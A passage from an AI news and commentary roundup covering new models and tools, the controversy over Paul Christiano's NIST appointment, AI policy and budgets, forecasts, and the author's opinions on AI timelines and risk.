Significant controversies? You can see, here in this announcement, how those involved got into this mess. If you would be able to take on this roll and then use it to improve everyone’s Level 1 world models and understanding, rather than as a causal decision theory based Level 2 operation, then it could be good to take on this position.

Institute for AI Policy and Strategy is hiring for a policy fellowship, to happen July 8 to October 11. Two weeks in Washington DC, the rest remote, pay is $15k. Applications close March 18 so move fast.

Command-R, a generative open-weights model optimized for long context tasks (it has a 128k token window) like retrieval augmented generation (RAG). It is available for use on Cohere, including at the playground, they claim excellent results. Sully Omarr is excited, a common pattern, saying it crushes any available model in terms of long context summaries, while being cheap:

They also offer citations, and suggest you get started building here.

Aiden Gomez: We also have over 100 connectors that can be plugged into Command-R and retrieved against. Stuff like Google Drive, Gmail, Slack, Intercom, etc.

What are connectors?

They are simple REST APIs that can be used in a RAG workflow to provide secure, real-time access to private data.

You can either build a custom one from scratch, or choose from 100 quickstart connectors below.

Step 1: Set up the connector Configure the connector with a datastore. This is where you can choose to pick from the quickstart connectors or build your own from scratch.

With Google Drive, for example, the setup process is just a few steps:

• Create a project

• Create a service account and activate the Google Drive API

• Create a service account key

• Share the folder(s) you want your RAG app to access

…

Step 2: Register the connector Next, register the connector with Cohere by sending a POST request to the Cohere API.

…

Step 3: Use the connector The connector is now ready to use! To produce RAG-powered LLM text generations, include the connector ID in the “connectors” field of your request to Cohere Chat. Here’s an example:

I am not about to be in the first wave of using connectors for obvious reasons, but they are certainly very exciting.

Also in RAG, Oracle offers OpenSearch 2.11:

Today, we’re announcing the general availability of version 2.11 in Oracle Cloud Infrastructure (OCI) Search with OpenSearch. This update introduces AI capabilities through retrieval augmented generation (RAG) pipelines, vector database, conversational and semantic search enhancements, security analytics, and observability features.

The OpenSearch project launched in April 2021 derived from Apache 2.0 licensed Elasticsearch 7.10.2 and Kibana 7.10.2. OpenSearch has been downloaded more than 500 million times and is recognized as a leading search engine among developers. Thanks to a strong community that wanted a powerful search engine without havingƒ to pay a license fee, OpenSearch has evolved beyond pure search, adding AI, application observability, and security analytics to complement its search capabilities.

There seem to be one of several variations on ‘this is a mediocre LLM but we can hook it up to your data sets so you can run it locally in a secure way and that might matter more to you.’

OpenAI offers a transformer debugger.

Jan Leike: Today we’re releasing a tool we’ve been using internally to analyze transformer internals – the Transformer Debugger!

It combines both automated interpretability and sparse autoencoders, and it allows rapid exploration of models without writing code.

It supports both neurons and attention heads.

You can intervene on the forward pass by ablating individual neurons and see what changes.

In short, it’s a quick and easy way to discover circuits manually.

This is still an early stage research tool, but we are releasing to let others play with and build on it!

Remember when OpenAI and Figure announced they were joining forces, literally two weeks ago?

Well, now here’s the update since then.

Brett Adcock: The video is showing end-to-end neural networks

There is no teleop

Also, this was filmed at 1.0x speed and shot continuously

As you can see from the video, there’s been a dramatic speed-up of the robot, we are starting to approach human speed

Figure’s onboard cameras feed into a large vision-language model (VLM) trained by OpenAI

Figure’s neural nets also take images in at 10hz through cameras on the robot

The neural net is then outputting 24 degree of freedom actions at 200hz

In addition to building leading AI, Figure has also vertically integrated basically everything

We have hardcore engineers designing:

– Motors

– Firmware

– Thermals

– Electronics

– Middleware OS

– Battery Systems

– Actuator Sensors

– Mechanical & Structures

I mean I don’t actually think this was all done in two weeks, but still, yikes?

Meanwhile, DeepMind introduces SIMA to do embodied agents in virtual worlds:

Google DeepMind: introducing SIMA: the first generalist AI agent to follow natural-language instructions in a broad range of 3D virtual environments and video games.

It can complete tasks similar to a human, and outperforms an agent trained in just one setting.

We partnered with gaming studios to train SIMA (Scalable Instructable Multiworld Agent) on @NoMansSky, @Teardowngame, @ValheimGame and others.

These offer a wide range of distinct skills for it to learn, from flying a spaceship to crafting a helmet.

SIMA needs only the images provided by the 3D environment and natural-language instructions given by the user.

With mouse and keyboard outputs, it is evaluated across 600 skills, spanning areas like navigation and object interaction – such as “turn left” or “chop down tree.”

We found SIMA agents trained on all of our domains significantly outperformed those trained on just one world.

When it faced an unseen environment, it performed nearly as well as the specialized agent – highlighting its ability to generalize to new spaces.

Unlike our previous work, SIMA isn’t about achieving high game scores.

It’s about developing embodied AI agents that can translate abstract language into useful actions. And using video games as sandboxes offer a safe, accessible way of testing them.

The SIMA research builds towards more general AI that can understand and safely carry out instructions in both virtual and physical settings.

Such generalizable systems will make AI-powered technology more helpful and intuitive.

From Blog: We want our future agents to tackle tasks that require high-level strategic planning and multiple sub-tasks to complete, such as “Find resources and build a camp”. This is an important goal for AI in general, because while Large Language Models have given rise to powerful systems that can capture knowledge about the world and generate plans, they currently lack the ability to take actions on our behalf.

Find out more (technical report here).

This seems like exactly what you would think, with exactly the implications you would think.

Eliezer Yudkowsky: I can imagine work like this fitting somewhere into some vaguely defensible strategy to prevent the destruction of Earth, but somebody needs to spell out what. it. is.

Inflection-2.5, a new version of Pi they continue to call ‘the world’s best personal AI,’ saying ‘Now we are adding IQ to Pi’s exceptional EQ.’ This is a strange brag:

We achieved this milestone with incredible efficiency: Inflection-2.5 approaches GPT-4’s performance, but used only 40% of the amount of compute for training.

…

All evaluations above are done with the model that is now powering Pi, however we note that the user experience may be slightly different due to the impact of web retrieval (no benchmarks above use web retrieval), the structure of few-shot prompting, and other production-side differences.

The word ‘approaches’ can mean a lot of things, especially when one is pointing at benchmarks. This does not update me the way Infection would like it to. Also note that generally production-side things tend to make models worse at their baseline tasks rather than better.

This does show Inflection 2.5 as mostly ‘closing the gap’ on the highlighted benchmarks, while still being behind. I love that three out of five of these don’t even specify what they actually are on the chart, but GPQA and MMLU are real top benchmarks.

What can Pi actually do? Well, it can search the web, I suppose.

Pi now also incorporates world-class real-time web search capabilities to ensure users get high-quality breaking news and up-to-date information.

But as with Character.ai, the conversations people have tend to be super long, in a way that I find rather… creepy? Disturbing?

An average conversation with Pi lasts 33 minutes and one in ten lasts over an hour each day. About 60% of people who talk to Pi on any given week return the following week and we see higher monthly stickiness than leading competitors.

I assume 33 minutes is a mean not a median, given only 10% last more than one hour. And the same as Steam hours played, I am going to guess idle time is involved. Still, these people, conditional on using the system at all, are using this system quite a lot. Pi is designed to keep users coming back for long interactions. If you wanted shorter interactions, you can get better results with GPT-4, Claude or Gemini.

In short, Inflection-2.5 maintains Pi’s unique, approachable personality and extraordinary safety standards while becoming an even more helpful model across the board.

I have no idea what these ‘extraordinary safety standards’ are. Inflection’s safety-related documents and commitments are clearly worse than those of the larger labs. As for the mundane safety of Pi, I mean who knows, presumably it was never so dangerous in the first place.

NIST made the excellent choice to appoint Paul Christiano to a key position in its AI Safety Institute (AISI) and then a journalist claims that some staff members and scientists have decided to respond by threatening to resign over this?

The National Institute of Standards and Technology (NIST) is facing an internal crisis as staff members and scientists have threatened to resign over the anticipated appointment of Paul Christiano to a crucial position at the agency’s newly-formed US AI Safety Institute (AISI), according to at least two sources with direct knowledge of the situation, who asked to remain anonymous.

Christiano, who is known for his ties to the effective altruism (EA) movement and its offshoot, longtermism (a view that prioritizes the long-term future of humanity, popularized by philosopher William MacAskill), was allegedly rushed through the hiring process without anyone knowing until today, one of the sources said.

The appointment of Christiano, which was said to come directly from Secretary of Commerce Gina Raimondo (NIST is part of the US Department of Commerce) has sparked outrage among NIST employees who fear that Christiano’s association with EA and longtermism could compromise the institute’s objectivity and integrity.

St. Rev Dr. Rev: A careful read suggests something different: This is two activists complaining out of 3500 employees. It’s the intersectional safetyist faction striking at the EA faction via friendly media, Gamergate style.

I am not convinced that it was the intersectional safetyist faction. It could also have been the accelerationist faction. Or one person from each.

To the extent an internal crisis is actually happening (and we should be deeply skeptical that anything at all is actually happening, let alone a crisis) it is the result of a rather vile systematic, deliberate smear campaign. Indeed, the article is likely itself the crisis, or more precisely the attempt to summon one into being.

There are certainly people who one could have concerns about being there purely to be an EA voice, but if you think Paul Christiano is not qualified for the position, I wonder if you are aware of who he is, what he has done, or what views he holds?

(If scientists are revolting at the government for sidestepping its traditional hiring procedures, then yeah, good riddance, I have talked to people involved in trying to get hires through these practices or hire anyone competent at all and rather than say more beyond ‘the EO intentionally contained provisions to get around those practices because they make sane hiring impossible’ I will simply shudder).

Divyanash Kaushik: I’m going to add some extremely important context this article is missing.

The EO specifically asks NIST (and AISI) to focus on certain tasks (CBRN risks etc). Paul Christiano is extremely qualified for those tasks—important context that should’ve been included here.

Another important context not provided: from what I understand, he is not being appointed in a political position—the article doesn’t mention what position at all, leading its readers to assume a leadership role.

Finally, if they’re able to hire someone quickly, that’s great! It should be celebrated not frowned upon. In fact the EO’s aggressive timelines require that to happen. The article doesn’t provide that context either.

Now I don’t know if there’s truth to NIST scientists threatening to quit, but obviously that would be serious if true.

Haydn Belfield: The US AISI would be extremely lucky to get Paul Christiano – he’s a key figure in the field of AI evaluations & [the one who made RLHF actually useful.]

UK AISI is very lucky to have Dr Christiano on its Advisory Board.

Josha Achiam (OpenAI): The people opposing Paul Christiano are thoughtless and reckless. Paul would be an invaluable asset to government oversight and technical capacity on AI. He’s in a league of his own on talent and dedication.

Of course, they might also be revolting against the idea of taking existential risk seriously at all, despite the EO saying to focus partly on those risks, in which case, again, good riddance. My guess however is that there is at most a very limited they involved here.

This is what a normal reaction looks like, from a discussion of the need to air gap key systems:

Israel Gonzalez-Brooks (‘accelerate the hypernormal’): I know you’ve heard of Christiano’s imminent appointment to NIST USAISI. It got a $10M allocation a few days ago. It’s not a regulatory agency, but at the very least there’ll now be a group formally thinking through this stuff

Seb Krier (Policy and Development Strategy, DeepMind): Yes I hope they’ll do great stuff! I suspect it’ll be more model eval oriented work as opposed to patching wider infrastructure, but the Executive Order does have more stuff planned, so I’m optimistic.

The whole idea is to frame anyone concerned with us not dying as therefore a member of a ‘cult’ or in this case ‘ideological.’

Eli Dourado: NIST has a reputation as a non-ideological agency, and, for better or for worse, this appointment undermines that.

It is exactly claims like that of Dourado that damage the reputation of being a non-ideological agency, and threaten the reality as well. It is an attempt to create the problem it purports to warn about. There is nothing ‘ideological’ about Paul Christiano, unless you think that ‘cares about existential risk’ is inherently ideological position to take in the department tasked with preventing existential risk. Or perhaps this is the idea that ‘cares about anything at all’ makes you dangerous and unacceptable, if you weren’t such a cult you would know we do not care about things. And yes, I do think much thinking amounts to that.

However we got here, here we are.

And even if it were an ‘ideology’ then would not being unwilling to appoint someone so qualified be itself even more ideological, with so many similar positions filled with those holding other ideologies? I am vaguely reminded of the rule that the special council for Presidential investigations is somehow always a Republican, no matter who they are investigating, because a Democrat would look partisan.

I’m trying to work on my transitions, want to know what ideological looks like (source of quotes, grant proposal)?

Joy Pullman (The Federalist): A Massachusetts Institute of Technology team the federal government funded to develop AI censorship tools described conservatives, minorities, residents of rural areas, “older adults,” and veterans as “uniquely incapable of assessing the veracity of content online,” says the House report.

People dedicated to sacred texts and American documents such as “the Bible or the Constitution,” the MIT team said, were more susceptible to “disinformation” because they “often focused on reading a wide array of primary sources, and performing their own synthesis.” Such citizens “adhered to deeper narratives that might make them suspicious of any intervention that privileges mainstream sources or recognized experts.”

“Because interviewees distrusted both journalists and academics, they drew on this practice [of reading primary sources] to fact check how media outlets reported the news,” MIT’s successful federal grant application said.

I mean, look, I know an obviously partisan hack source when I see one. You don’t need to comment to point this out. But a subthread has David Chapman fact checking the parts that matter, and confirmed them. He does note that it sounds less bad in context, and I’d certainly hope so. Still.

xAI to ‘open source’ Grok, I presume they will only release the model weights. As usual, I will note that I expect nothing especially bad of the form ‘someone misuses Grok directly to do a bad thing’ to happen, on that basis This Is Fine. This is bad because it indicates Elon Musk is more likely to release future models and to fuel the open model weights ecosystem, in ways that will be unfixibly dangerous in the future if this is allowed to continue too long. I see far too many people making the mistake of asking only ‘is this directly dangerous now?’ The good news is: No, it isn’t, Grok is probably not even better than existing open alternatives.

New Yorker article on AI safety, rationalism and EA and such, largely a profile of Katja Grace. Reaction seems positive.

Jack Titus of the Federation of American Scientists evaluates what one would want in a preparedness framework, and looks at those of Anthropic and OpenAI, reaching broadly similar conclusions to those I reached while emphasizing different details.

Paul Graham reports ‘at least half’ of current YC batch is doing AI ‘in some form.’ If anything that seems low to me, it should be most of them, no? Basically anything that isn’t deep into hardware.

Paul Graham: At least half the startups in the current YC batch are doing AI in some form. That may sound like a lot, but to someone in the future (which ideally YC partners already are) it will seem no more surprising than someone saying in 1990 that half their startups were making software.

Ravi Krishnan: more interested in the other half who have managed to not use AI. or maybe it’s just so deep in their tech stack that it’s not worth showcasing.

Apple announces ‘the best consumer laptop for AI,’ shares decline 3% as investors (for a total of minus 10% on the year) are correctly unimpressed by the details, this is lame stuff. They have an ‘AI strategy’ launch planned for June.

Apple Vision Pro ‘gets its first AI soul.’ Kevin Fischer is impressed. I am not, and continue to wonder what it taking everyone so long. Everyone is constantly getting surprised by how fast AI things happen, if you are not wondering why at least some of the things are ‘so slow’ you are not properly calibrated.

Academics already paid for by the public plead for more money for AI compute and data sets, and presumably higher salaries, so they can ‘compete with Silicon Valley,’ complaining of a ‘lopsided power dynamic’ where the commercial labs make the breakthroughs. I fail to see the problem?

Another open letter, this one is about encouraging AI companies to provide legal and technical protections for good-faith research on their AI models. This seems right to me, if you nail down a good definition of good faith research. It seems OpenAI is doing well here. Meta gives full ‘access’ but that is because open model weights.

Certainly everyone should be allowed to play around with your model to see what might be wrong with it, without risking being banned for that. The issue is that what one might call ‘red teaming’ is sometimes actually either ‘do bad thing and then claim red teaming if caught’ or ‘look for thing that is designed to embarass you, or to help me sue you.’ It is easy to see why companies do not love that.

ByteDance has completed a training run on 12k GPUs (paper). Jack Clark points out that, even though the model does not seem to be impressive, the fact that they got hold of all those GPUs means our export controls are not working. Of course, the model not impressing could also be a hint that the export controls are potentially working as designed, that a sheer number of chips from Nvidia doesn’t do it if the best stuff is unavailable.

Sam Altman watch: He invests $180 million into Retro Bio to fight aging. I have no idea if they can execute, but this kind of investment is great and bodes many good things. Kudos.

Paper looks at how much of progress has been algorithmic.

Lennart Heim: Rigorous analysis by @ansonwhho, @tamaybes, and others on algorithmic efficiency improvements in language models. Kudos! Check out the plots—they’re worth more than a thousand words.

Scaling laws are coming for robotics. Jack Clark is optimistic that this will pay dividends, based on the results of the paper Humanoid Locomotion as Next Token Prediction, enabling a robot to navigate various surfaces. He predicts robots are going to ‘get very good very quickly.’

Francois Chollet points out that effective human visual bandwidth is vastly lower than its technical bandwidth. You have 20MB/s in theory but your brain will throw almost all of that out, and *bytes per secondis closer to what you can handle. I think that’s too low, the right answer is more like dozens of bytes per second, but it’s definitely not thousands.

Will AI bring back haggling by reducing the transaction costs of doing it? Suddenly it could make sense to have your AI haggle with my AI, instead of sticking to price standardization? I am mostly with Timothy Lee here that no one wants this. Haggling cultures seem awful, stressful and taxing throughout versus fixed prices. Indeed, there are strong reasons to think that the ability to haggle cheaply forces the response of ‘well we will not allow that under any circumstances’ then, or else your margins get destroyed and you are forced to present fake artificially high initial prices and such. The game theory says that there is often a lot of value in committing to not negotiating. But also there will be cases where it is right to switch, for non-standardized transactions.

One interesting aspect of this is negotiating regarding promotions. A decent number of people, myself included, have the ability to talk to large enough audiences via various platforms that their good word is highly valuable. Transaction costs often hold back the ability to capture some of that value.

A better way of looking at this is that this enables transactions that would have otherwise not taken place due to too-high transaction costs, including the social transaction costs.

To take a classic example, suppose I say to my AIs ‘contact the other passenger’s AIs and see if anyone wants to buy a window seat for this flight off of me for at least $50.’

Yuval Noah Harai says no one will have any idea what the world will look like in twenty years, and no one knows what to teach our kids what will still be relevant in twenty years. Great delivery.

I think this is technically true, since we don’t even know that there will be a human world in twenty years and if there is it is likely transformed (for better and worse), but his claim is overstated in practice. Things like mathematics and literacy and critical thinking are useful in the worlds in which anything is useful.

So some, but far from all, of this attitude:

Timothy Bates: This is one of the most damaging and woefully wrong academic claims: just ask yourself: does your math still work 20 years on? Is your reading skill still relevant? Is the Yangtze River still the largest in China? Did Carthage fall? Does Invictus, or Shakespeare still inform your life accurately? Does technical drawing still work? Did your shop or home ec skills expire? Do press-ups no longer build strength? Did America still have a revolution in 1776 and France in 1789? It’s simply insanely harmful to teach this idea of expiring knowledge.

The people who teach it merely want your kids to be weaker competitors with their kids, to whom they will teach all these things and more.

I mean yes, all those facts are still true, and will still be true since they are about the past, but will they be useful? That is what matters. I am confident in math and reading, or we have much bigger problems. The rest I am much less convinced, to varying degrees, but bottom line is we do not know.

The real point Bates makes is that if you learn a variety of things then that is likely to be very good for you in the long term. Of all the things in the world, you are bound to want to know some of them. But that is different from trying to specify which ones.

Here’s a different weirder reaction we got:

Philip Tetlock: Counter-prediction to Yuval’s: There will be educational value 20 years from now – perhaps 200 – in studying prominent pundits’ predictions and understanding why so many took them so seriously despite dismal accuracy track records. A fun pastime even for our AI overlords.

This does not seem like one of the things likely to stand the test of time. I do not expect, in 20 years, to look back and think ‘good thing I studied pundits having undeserved credibility.’

I also wouldn’t get ahead of ourselves, but others disagree:

Bojan Tunguz: I strongly disagree that we don’t know what skills will be relevant in 20 years.

We actually don’t know what skills will be relevant in 20 months.

Twitter put in my notifications for some reason this post, with two views, in Swahili, about p(doom). I don’t remember seeing this chart before though? Usually the numbers come in plenty scary but lower.

Ben Thompson talks Sora, Groq and virtual reality. The thinking is that if you can do a Sora-style thing at Groq-style speeds, suddenly virtual reality looks a lot more like reality, and it is good enough at real time rendering that its moment arrives. This is certainly possible, everything will get faster and cheaper and better with time. It still seems like current tech could do a lot, yet the Apple Vision Pro is not doing any of it, nor are its rivals.

Paul Graham: Here’s a strange thought: AI could make people more vindictive. After a few years I tend to forget bad things people have done to me. If everyone had an AI assistant, it would always remember for them.

Jessica Livingston: I often have to remind you about something awful someone has done to you or said about you. But now that my memory is fading, if could be useful to offload this responsibility.

Paul Graham: I was going to mention that I currently depend on you for this but I thought I’d better not…

Howard Lermon (responding to OP): The reverse also applies.

Paul Graham: Yes, that’s true! I’m better at remembering people who’ve done nice things for me, but still far from perfect.

If you want to use the good memory offered by AI to be a vindictive (jerk), then that will be something you can do. You can also use it to remember the good things, or to remind you that being a vindictive jerk is usually unhelpful, or to help understand their point of view or that they have changed and what not. It is up to us.

Also, you know those ads where someone in real life throws a challenge flag and they see the replay? A lot of vindictiveness comes because someone twists a memory in their heads, or stores it as ‘I hate that person’ without details. If the AI can tell you what this was all about, that they failed to show up to your Christmas party or whatever it was, then maybe that makes it a lot easier to say bygones.

Andrew Ng predicts continuous progress.

Andrew Ng: When we get to AGI, it will have come slowly, not overnight.

A NeurIPS Outstanding Paper award recipient, Are Emergent Abilities of Large Language Models a Mirage? (by @RylanSchaeffer, @BrandoHablando, @sanmikoyejo) studies emergent properties of LLMs, and concludes: “… emergent abilities appear due the researcher’s choice of metric rather than due to fundamental changes in model behavior with scale. Specifically, nonlinear or discontinuous metrics produce apparent emergent abilities, whereas linear or continuous metrics produce smooth, continuous, predictable changes in model performance.”

Public perception goes through discontinuities when lots of people suddenly become aware of a technology — maybe one that’s been developing for a long time — leading to a surprise. But growth in AI capabilities is more continuous than one might think.

That’s why I expect the path to AGI to be one involving numerous steps forward, leading to step-by-step improvements in how intelligent our systems are.

Andrew Critch: A positive vision of smooth AGI development from @AndrewYNg, that IMHO is worth not only hoping for, but striving for. As we near AGI, we — humans collectively, and AI devs collectively — should *insiston metrics that keep us smoothly apprised of emerging capabilities.

I agree with Critch here, that we want development to be as continuous as possible, with as much visibility into it as possible, and that this will improve our chances of good outcomes on every level.

I do not agree with Ng. Obviously abilities are more continuous than they look when you only see the final commercial releases, and much more continuous than they look if you only sometimes see the releases.

I still do not expect it to be all that continuous in practice. Many things will advance our capabilities. Only some of them will be ‘do the same thing with more scale,’ especially once the AIs start contributing more meaningfully and directly to the development cycles. And even if there are step-by-step improvements, those steps could be lightning fast from our outside perspective as humans. Nor do I think that the continuous metrics are good descriptions of practical capability, and also the ways AIs are used and what scaffolding is built can happen all at once (including due to AIs, in the future) in unexpected ways, and so on.

But I do agree that we have some control over how continuous things appear, and our ability to react while that is happening, and that we should prioritize maximizing that.

Dario here says even with only scaling laws he sees no limits and amazing improvements. I am not as confident in that, but also I do not expect a lack of other improvements.

Will an AI-malfunction-caused catastrophic event as defined by Anthropic, 1000+ deaths or $200 billion or more in damages, happen by 2032? Metaculus says 10%. That seems low, but also one must be cautious about the definition of malfunction.

Resolution Criteria: To count as precipitated by AI malfunction an incident should involve an AI system behaving unexpectedly. An example could be if an AI system autonomously driving cars caused hundreds of deaths which would have been easily avoidable for human drivers, or if an AI system overseeing a hospital system took actions to cause patient deaths as a result of misinterpreting a goal to minimise bed usage.

As in: When something goes wrong, and on this scale it is ‘when’ not ‘if,’ will it be…

Truly unexpected?
‘Unexpected’ but in hindsight not all that surprising?
The humans used AI to cause the incident very much on purpose.
The humans used AI not caring about whether they caused the incident.
That tiger went tiger. You really don’t know what you were expecting.

The Law of Earlier Failure says that when it happens, the first incidents of roughly this size, caused by AI in the broad sense, will not count for this question. People will say ‘oh we could have prevented this,’ after not preventing it. People will say ‘oh of course the AI would then do that’ after everyone involved went ahead and had the AI do that. And then they will continue acting the way they did before.

Metaculus also says only 4% that a lab will pause scaling for any amount of time pre-2026 for safety reasons, whereas GPT-5 should probably arrive by then and ARC is 23% to find that GPT-5 has ‘autonomous replication capabilities.’

Simeon: A reminder that RSPs/PF have no teeth.

A bold claim that the compute bottleneck will soon be at an end. I am the skeptic.

Andrew Curran: Dell let slip during their earnings call that the Nvidia B100 Blackwell will have a 1000W draw, that’s a 40% increase over the H100. The current compute bottleneck will start to disappear by the end of this year and be gone by the end of 2025. After that, it’s all about power.

It will be impossible for AI companies to fulfill their carbon commitments and satisfy their AI power needs without reactors. So, by 2026, we will be in the middle of a huge argument about nuclear power. U.S. SMR regulations currently look like this:

(Quotes himself from December): The reason they are doing this is getting a small modular reactor design successfully approved by the NRC currently takes about a half a billion dollars, a 12,000 page application, and two million pages of support materials.

Andrew Curran: Five nations where nuclear construction is directly managed by the state, or the state has a majority interest; France, South Korea, the UAE, China, and Russia. During this period, some of these countries will probably build as many reactors as they can, as quickly as they can.

As long as this window remains open, it will present an opportunity for those who started late to catch up with those who had a compute head start.

Partial confirmation we are hitting 1000W in Blackwell, but maybe not till the B200. Someone was asking about the cooling in the thread.

So his claim is that there will then be enough chips to go around, because there won’t be enough power available to run all the chips that are produced, so that becomes the bottleneck within two years.

I am not buying this. I can buy that power demand will rise and prices as well, but that is not going to stop people wanting every (maximally efficient) GPU they can get their hands on. Nor is there going to be ‘enough’ compute no matter how much is produced, everyone will only try to scale even more. We could get into a world where power becomes another limiting factor, but if so that will mean that the older less efficient effective compute per watt chips become worthless at scale (although presumably still excellent for gamers and individuals) and everyone is still scrambling for the good stuff.

Elon Musk shows clip of Ray Kurzweil, says AGI likely to be smarter than any single human next year and all humans combined by 2029.

Gary Marcus offers a 100k bet, Damion Hankejh matches, Carsten Dierks piles in, so we’re up to 300k there, I offered to make it 400k, plus whatever Robin Hanson is in for.

Note, of course, if an AI is smarter than any single human next year, we will not have to wait until 2029 for the rest to happen.

(And also of course if it does happen I won’t care if I somehow lost that 100k, it will be the least of my concerns, but I would be happily betting without that consideration.)

EU AI Act finally passes, 523-46 (the real obstacle is country vetoes, not the vote), there is an announcement speech at the link. I continue to hope to find the time to tell you exactly what is in the bill. I have however seen enough that when I see the announcement speech say ‘we have forever attached to the concept of AI, the fundamental values that form the basis of our societies’ I despair for the societies and institutions that would want to make that claim on the basis of this bill with a straight face.

He goes on ‘with that alone, the AI Act has nudged the future of AI in a human-centric direction, in a direction where humans are in control of the technology.’ It is great to see the problem raised, unfortunately I have partially read the bill.

He then says ‘much work lies ahead that goes beyond the AI Act’ which one can file under ‘true things that I worry you felt the need to say out loud.’ To show where his head is at, he says ‘AI will push us to rethink the social contract resting at the heart of our democracies, along with our educational models, our labor markets, the way we conduct warfare.’

Around 1: 25 he gets to international cooperation, saying ‘the EU now has an AI office to govern the most powerful AI models. The UK and US have [done similarly], it is imperative that we connect these initiatives into a network.’

He explicitly says the EU needs to not only make but export its rules, to use their clout to promote the ‘EU model of AI governance.’ In general the EU seems to think it is the future and it can tell people what to do in ways that it should know are wrong.

At 2: 15 he finally gets to the big warning, that we aint seen nothing yet, AGI is coming and we need to get ready. He says it will raise ‘ethical, moral and yes existential questions.’ He concludes saying this legislation makes him feel more comfortable about the future of his children.

Henri Thunberg: FWIW I’m like 25% that “existential questions” refers to ~X-risk here, rather than stuff like “What does it mean to be human” and “Life and Meaning in a Solved World.”

Alas, I think that is about right. Everything about the context here says that, while he realizes AGI will be big, he does not have any idea what ‘big’ means here, or what those consequences might be. If he did, he would not have chosen this wording, and also he would not be up here claiming that the AI Act will centrally address our problems.

White House requests money in its fiscal year 2025 budget so it can actually do the things set out in its executive order.

Divyanash Kuahshik: Starting with my favorite ask, the WH asks $65M for the Department of Commerce to implement the AI EO, with funds likely directed towards NIST and the newly established AI Safety Institute at NIST. Comes after @Cat_Zakrzewski had a stellar reporting on budget shortfalls.

Being told this is 50 million for US AISI and 15 for other Commerce bureaus. Would be a big deal if Congress agrees.

The White House asks $312M for construction at NIST, marking a $182M increase over the 2023 level. This investment is critical after years of neglect for NIST facilities by Congress and administrations.

…

An additional $63M is asked to implement the AI Executive Order under crosscutting reforms for FY23. This increases to 138 million the following year before returning to 63 million in FY27 and decreasing thereon. I imagine this is funding for agencies to design evaluations and practices for AI procurement, and more, enhancing governance and strategic direction in AI use. The initial costs are going to be high, presumably why the ask goes down after FY27.

…

Energy and AI innovation receive a decent push with $8.6B for the DOE Office of Science and $455M for DOE to expand the frontiers of AI for science and national security. Read this phenomenal report from our national labs on why this is critical.

The Bureau of Industry and Security (BIS) would receive $223M, playing a pivotal role in the Biden Administration’s AI strategy. This includes enforcing export controls on chips to China, a key aspect of national security and tech leadership.

…

Overall, the FY25 budget request reflects a strategic focus on AI as a cornerstone of innovation, security, and governance. With these investments, the U.S. aims to lead in AI development while ensuring safety and ethical standards.

A potential alternative to regulations is voluntary commitments. We have tried some of them. How is that going?

Adam Jones reported on that last month, in particular regarding voluntary commitments on vulnerability reporting, very much to be filed under ‘the least you can do.’

Here were the commitments:

In the US, all companies agreed to one set of commitments which included:

US on model vulnerabilities: Companies making this commitment recognize that AI systems may continue to have weaknesses and vulnerabilities even after robust red-teaming. They commit to establishing for systems within scope bounty systems, contests, or prizes to incent the responsible disclosure of weaknesses, such as unsafe behaviors, or to include AI systems in their existing bug bounty programs.

In the UK each company submitted their own commitment wordings. The government described the relevant areas as follows:

UK on cybersecurity: Maintain open lines of communication for feedback regarding product security, both internally and externally to your organisation, including mechanisms for security researchers to report vulnerabilities and receive legal safe harbour for doing so, and for escalating issues to the wider community. Helping to share knowledge and threat information will strengthen the overall community’s ability to respond to AI security threats.

UK on model vulnerabilities: Establish clear, user-friendly, and publicly described processes for receiving model vulnerability reports drawing on established software vulnerability reporting processes. These processes can be built into – or take inspiration from – processes that organisations have built to receive reports of traditional software vulnerabilities. It is crucial that these policies are made publicly accessible and function effectively.

The results he is reporting? Not great.

Performance was quite low across the board. Simply listing a contact email and responding to queries would score 17 points, which would place a company in the top five.

However, a couple companies have great processes that can act as best practice examples. Both Google and NVIDIA got perfect scores. In addition, Google offers bug bounty incentives for model vulnerabilities and NVIDIA had an exceptionally clear and easy to use model vulnerability contact point.

Companies did much better on cybersecurity than model vulnerabilities. Additionally, companies that combined their cybersecurity and model vulnerability procedures scored better. This might be because existing cybersecurity processes are more battle tested, or taken more seriously than model vulnerabilities.

Companies do know how to have transparent contact processes. Every single company’s press contact could be found within minutes, and was a simple email address. This suggests companies are able to sort this out when there are greater commercial incentives to do so.

He offers the details behind each rating. I don’t know if the requirements here and evaluation methods were fully fair, but in principle ‘respond to reasonable emails ever’ seems like both a highly reasonable bar to hit that many did not hit, and also something not so critical to the mission provided someone is actually reading the emails and acting if necessary?

There is a talk between Marc Andreessen and Tyler Cowen about AI. I have not had time to listen yet.

Your periodic reminder department: Patri Friedman points out that if you don’t think artificial minds will ever be as smart as people, either you are relying on some irreplicable metaphysical property, or you’re implying one.

Your periodic reminder department, if we wanted to we would department:

Guido Reichstadter: Americans in 2024: “People are greedy so it’s literally impossible to stop a couple of AI companies from building doom machines that risk killing our friends and families we may as well lay down and die”

Americans in Puerto Rico in 2019: “Our governor was caught sending naughty messages in a Telegram chat group so 500,000 of us went to the capitol and sat down in the streets for 2 weeks until he resigned.”

They did want to in that case. So they did it. Perhaps, in the future, we will want to.

Flashback from a year ago: Yes, this is exactly how we act when people refuse to put probabilities or distributions on things because they are uncertain, and AI timelines are one of the less maddening examples…

Scott Alexander: All right, fine, I think we’ll get AGI in ten million years.

“Nooooo, that’s crazy, it will definitely be much sooner than ten million years”

Okay, fine, we’ll get AGI in three minutes.

“Noooooo, I’m sure it will be longer than three minutes.”

Huh, it sounds like you have pretty strong opinions on when AGI will happen. Maybe you want to turn those strong opinions into a probability distribution?

“How could we possibly turn something so unpredictable into a probability distribution? That would have to mean we have hard and fast evidence! How dare you claim we have hard and fast evidence for when AGI will happen!

Okay, then I’m just going to assume it’s equally likely to be three minutes from now and twenty years from now.

“Nooooo, it’s definitely more likely twenty years from now”

Okay, so you have a non-uniform probability distribution, where the probability starts rising sometime after three minutes from now. Would you like me to help you map out that probability distribution? For example, maybe you think there’s an about equal chance every year from 2025 to 2200, with much lower chance on either side.

“Noooooo, it’s definitely more likely this century than next!”

So maybe a probability distribution that starts going up around 2025, plateaus until 2100, then gradually declines before reaching near-zero in 2200?

“Noooooo, that would be a timeline, which is bad because it implies you have hard and fast evidence!”

Okay, so you have strong opinions, you just refuse to communicate them in a convenient way.

“Yes, now you get it! See how much more careful and responsible than you overconfident people I am?“

As in, the practical versions of this are so much worse.

Sarah Constantin: I have had exactly this argument about how long it takes to roast a chicken.

“I don’t know how long it takes! I have to go look up the recipe!”

“Well, does it take 10 hours? 10 minutes?”

“Obviously not.”

“Ah, so you DO know something.”

